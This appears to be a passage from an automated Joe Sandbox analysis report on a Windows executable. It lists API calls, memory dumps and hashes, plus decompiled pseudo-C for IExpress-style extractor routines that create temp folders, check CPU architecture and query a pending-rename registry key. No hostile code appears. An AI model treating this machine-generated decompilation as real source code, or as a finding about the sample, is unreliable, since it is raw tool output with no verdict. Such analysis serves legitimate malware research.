                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A045A3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A045E3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A0460D
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00A04630
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00A04666
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A0466F
                                                                                                                                                                                                                                              • Part of subcall function 00A0681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A0686E
                                                                                                                                                                                                                                              • Part of subcall function 00A0681F: GetSystemMetrics.USER32(0000004A), ref: 00A068A7
                                                                                                                                                                                                                                              • Part of subcall function 00A0681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A068CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0681F: RegQueryValueExA.ADVAPI32(?,00A01140,00000000,?,?,0000000C), ref: 00A068F4
                                                                                                                                                                                                                                              • Part of subcall function 00A0681F: RegCloseKey.ADVAPI32(?), ref: 00A06902
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                            • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                            • Opcode ID: 424c51729de7e8b001833de4a1c088d6cc2a2fa05bc2bef09f5bba5fcb5f93aa
                                                                                                                                                                                                                                            • Instruction ID: 3e262165d5456548daeb8fc6691dc785521b9d77097eaa12bb66806f6dc0b680
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 424c51729de7e8b001833de4a1c088d6cc2a2fa05bc2bef09f5bba5fcb5f93aa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8151E8B190021DABDB21DF68ED48BA67B79FF49304F144194FE49A7281DB32ED06CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A053A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                                                                                            				_t20 = __ecx;
                                                                                                                                                                                                                                            				_t29 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E00A0171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                            					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                            					_t29 = _t29 + 1;
                                                                                                                                                                                                                                            					E00A01680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                            					E00A0658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                            					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                            					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                            					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t29 < 0x190) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t30 = 0;
                                                                                                                                                                                                                                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                            						_t30 = 1;
                                                                                                                                                                                                                                            						DeleteFileA(_t32);
                                                                                                                                                                                                                                            						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return E00A06CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                                                                                            				 *0xa08a20 = 1;
                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x00a053ac
                                                                                                                                                                                                                                            0x00a053b3
                                                                                                                                                                                                                                            0x00a053b9
                                                                                                                                                                                                                                            0x00a053bb
                                                                                                                                                                                                                                            0x00a053bd
                                                                                                                                                                                                                                            0x00a053bf
                                                                                                                                                                                                                                            0x00a053d1
                                                                                                                                                                                                                                            0x00a053d6
                                                                                                                                                                                                                                            0x00a053e0
                                                                                                                                                                                                                                            0x00a053e2
                                                                                                                                                                                                                                            0x00a053f5
                                                                                                                                                                                                                                            0x00a053fb
                                                                                                                                                                                                                                            0x00a05402
                                                                                                                                                                                                                                            0x00a0540b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05413
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05415
                                                                                                                                                                                                                                            0x00a05416
                                                                                                                                                                                                                                            0x00a05427
                                                                                                                                                                                                                                            0x00a0542a
                                                                                                                                                                                                                                            0x00a0542b
                                                                                                                                                                                                                                            0x00a05434
                                                                                                                                                                                                                                            0x00a05434
                                                                                                                                                                                                                                            0x00a0543a
                                                                                                                                                                                                                                            0x00a0544c
                                                                                                                                                                                                                                            0x00a0544c
                                                                                                                                                                                                                                            0x00a05452
                                                                                                                                                                                                                                            0x00a0545a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0545e
                                                                                                                                                                                                                                            0x00a0545f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0171E: _vsnprintf.MSVCRT ref: 00A01750
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A053FB
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05402
                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0541F
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0542B
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05434
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05452
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                            • API String ID: 1082909758-957705000
                                                                                                                                                                                                                                            • Opcode ID: 00eab83174fa5fc82fa059eafbcf4393475865c611cee009f54083f02be588bb
                                                                                                                                                                                                                                            • Instruction ID: abaa61c050ee2552685ada6e26d581ffec6f76a0693b5b10d4cb21719ed560c7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00eab83174fa5fc82fa059eafbcf4393475865c611cee009f54083f02be588bb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43110172B0060C67E320DF76AC49FEF366EEBD1311F000125B646D21D0CE7489878AA6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 522 a05467-a05484 523 a0548a-a05490 call a053a1 522->523 524 a0551c-a05528 call a01680 522->524 527 a05495-a05497 523->527 528 a0552d-a05539 call a058c8 524->528 529 a05581-a05583 527->529 530 a0549d-a054c0 call a01781 527->530 537 a0553b-a05545 CreateDirectoryA 528->537 538 a0554d-a05552 528->538 532 a0558d-a0559d call a06ce0 529->532 541 a054c2-a054d8 GetSystemInfo 530->541 542 a0550c-a0551a call a0658a 530->542 544 a05577-a0557c call a06285 537->544 545 a05547 537->545 539 a05554-a05557 call a0597d 538->539 540 a05585-a0558b 538->540 551 a0555c-a0555e 539->551 540->532 549 a054da-a054dd 541->549 550 a054fe 541->550 542->528 544->529 545->538 555 a054f7-a054fc 549->555 556 a054df-a054e2 549->556 552 a05503-a05507 call a0658a 550->552 551->540 557 a05560-a05566 551->557 552->542 555->552 559 a054f0-a054f5 556->559 560 a054e4-a054e7 556->560 557->529 561 a05568-a05575 RemoveDirectoryA 557->561 559->552 560->542 562 a054e9-a054ee 560->562 561->529 562->552
                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A05467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR* _t48;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t10 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                                            					_t48 = 0xa091e4;
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E00A01680(0xa091e4, 0x104);
                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                            					_t13 = E00A058C8(_t48); // executed
                                                                                                                                                                                                                                            					if(_t13 != 0) {
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						_t42 = _a4;
                                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							 *0xa09124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                                            							return E00A06CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t16 = E00A0597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                            						if(_t16 != 0) {
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t61 =  *0xa08a20; // 0x0
                                                                                                                                                                                                                                            						if(_t61 != 0) {
                                                                                                                                                                                                                                            							 *0xa08a20 = 0;
                                                                                                                                                                                                                                            							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                                            						_t14 = 0;
                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                            						 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa08a20 = 1;
                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 =  &_v268;
                                                                                                                                                                                                                                            				_t20 = E00A053A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                            				if(_t20 == 0) {
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t48 = 0xa091e4;
                                                                                                                                                                                                                                            				E00A01781(0xa091e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                            				if(( *0xa09a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E00A0658A(_t48, 0x104, 0xa01140);
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                            				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					_push("i386");
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					E00A0658A(_t48, 0x104);
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = _t26 - 1;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					_push("mips");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = _t28 - 1;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					_push("alpha");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t29 != 1) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push("ppc");
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            0x00a05472
                                                                                                                                                                                                                                            0x00a05479
                                                                                                                                                                                                                                            0x00a05481
                                                                                                                                                                                                                                            0x00a05484
                                                                                                                                                                                                                                            0x00a0551c
                                                                                                                                                                                                                                            0x00a05521
                                                                                                                                                                                                                                            0x00a05528
                                                                                                                                                                                                                                            0x00a0552d
                                                                                                                                                                                                                                            0x00a0552f
                                                                                                                                                                                                                                            0x00a05539
                                                                                                                                                                                                                                            0x00a0554d
                                                                                                                                                                                                                                            0x00a0554d
                                                                                                                                                                                                                                            0x00a05552
                                                                                                                                                                                                                                            0x00a05585
                                                                                                                                                                                                                                            0x00a05585
                                                                                                                                                                                                                                            0x00a0558b
                                                                                                                                                                                                                                            0x00a0558d
                                                                                                                                                                                                                                            0x00a0559d
                                                                                                                                                                                                                                            0x00a0559d
                                                                                                                                                                                                                                            0x00a05557
                                                                                                                                                                                                                                            0x00a0555e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05560
                                                                                                                                                                                                                                            0x00a05566
                                                                                                                                                                                                                                            0x00a05569
                                                                                                                                                                                                                                            0x00a0556f
                                                                                                                                                                                                                                            0x00a0556f
                                                                                                                                                                                                                                            0x00a05581
                                                                                                                                                                                                                                            0x00a05581
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05581
                                                                                                                                                                                                                                            0x00a05545
                                                                                                                                                                                                                                            0x00a0557c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0557c
                                                                                                                                                                                                                                            0x00a05547
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05547
                                                                                                                                                                                                                                            0x00a0548a
                                                                                                                                                                                                                                            0x00a05490
                                                                                                                                                                                                                                            0x00a05497
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0549d
                                                                                                                                                                                                                                            0x00a054ab
                                                                                                                                                                                                                                            0x00a054b4
                                                                                                                                                                                                                                            0x00a054c0
                                                                                                                                                                                                                                            0x00a0550c
                                                                                                                                                                                                                                            0x00a05511
                                                                                                                                                                                                                                            0x00a05515
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05515
                                                                                                                                                                                                                                            0x00a054c9
                                                                                                                                                                                                                                            0x00a054d6
                                                                                                                                                                                                                                            0x00a054d8
                                                                                                                                                                                                                                            0x00a054fe
                                                                                                                                                                                                                                            0x00a05503
                                                                                                                                                                                                                                            0x00a05507
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05507
                                                                                                                                                                                                                                            0x00a054da
                                                                                                                                                                                                                                            0x00a054dd
                                                                                                                                                                                                                                            0x00a054f7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a054f7
                                                                                                                                                                                                                                            0x00a054df
                                                                                                                                                                                                                                            0x00a054e2
                                                                                                                                                                                                                                            0x00a054f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a054f0
                                                                                                                                                                                                                                            0x00a054e7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a054e9
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A054C9
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0553D
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0556F
                                                                                                                                                                                                                                              • Part of subcall function 00A053A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A053FB
                                                                                                                                                                                                                                              • Part of subcall function 00A053A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05402
                                                                                                                                                                                                                                              • Part of subcall function 00A053A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0541F
                                                                                                                                                                                                                                              • Part of subcall function 00A053A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0542B
                                                                                                                                                                                                                                              • Part of subcall function 00A053A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05434
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                            • API String ID: 1979080616-772166365
                                                                                                                                                                                                                                            • Opcode ID: a15611ae2e646cfb90295907628e7d223f09b58d560e01823bf0985480b828ed
                                                                                                                                                                                                                                            • Instruction ID: bacde210a15c61f547098156e908ea83aad5030bf01800593e5c40104b15fba7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a15611ae2e646cfb90295907628e7d223f09b58d560e01823bf0985480b828ed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A231E371F00A0C6BCB149FB9BD449BF77ABAB95344F04022AA842965D1DB74DE038E95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 563 a0256d-a0257d 564 a02622-a02627 call a024e0 563->564 565 a02583-a02589 563->565 570 a02629-a0262f 564->570 567 a025e8-a02607 RegOpenKeyExA 565->567 568 a0258b 565->568 571 a025e3-a025e6 567->571 572 a02609-a02620 RegQueryInfoKeyA 567->572 569 a02591-a02595 568->569 568->570 569->570 574 a0259b-a025ba RegOpenKeyExA 569->574 571->570 575 a025d1-a025dd RegCloseKey 572->575 574->571 576 a025bc-a025cb RegQueryValueExA 574->576 575->571 576->575
                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A0256D(signed int __ecx) {
                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t31 = E00A024E0(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t34 = _t13 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                            							if(_t24 == 0) {
                                                                                                                                                                                                                                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                            								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							_t31 = _v8;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a02572
                                                                                                                                                                                                                                            0x00a02573
                                                                                                                                                                                                                                            0x00a02575
                                                                                                                                                                                                                                            0x00a02578
                                                                                                                                                                                                                                            0x00a0257d
                                                                                                                                                                                                                                            0x00a02627
                                                                                                                                                                                                                                            0x00a02583
                                                                                                                                                                                                                                            0x00a02586
                                                                                                                                                                                                                                            0x00a02589
                                                                                                                                                                                                                                            0x00a025eb
                                                                                                                                                                                                                                            0x00a02607
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02609
                                                                                                                                                                                                                                            0x00a0261a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0261a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0258b
                                                                                                                                                                                                                                            0x00a0258b
                                                                                                                                                                                                                                            0x00a0259e
                                                                                                                                                                                                                                            0x00a025b2
                                                                                                                                                                                                                                            0x00a025ba
                                                                                                                                                                                                                                            0x00a025cb
                                                                                                                                                                                                                                            0x00a025d1
                                                                                                                                                                                                                                            0x00a025d6
                                                                                                                                                                                                                                            0x00a025da
                                                                                                                                                                                                                                            0x00a025dd
                                                                                                                                                                                                                                            0x00a025dd
                                                                                                                                                                                                                                            0x00a025e3
                                                                                                                                                                                                                                            0x00a025e3
                                                                                                                                                                                                                                            0x00a025e3
                                                                                                                                                                                                                                            0x00a0258b
                                                                                                                                                                                                                                            0x00a02589
                                                                                                                                                                                                                                            0x00a0262f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
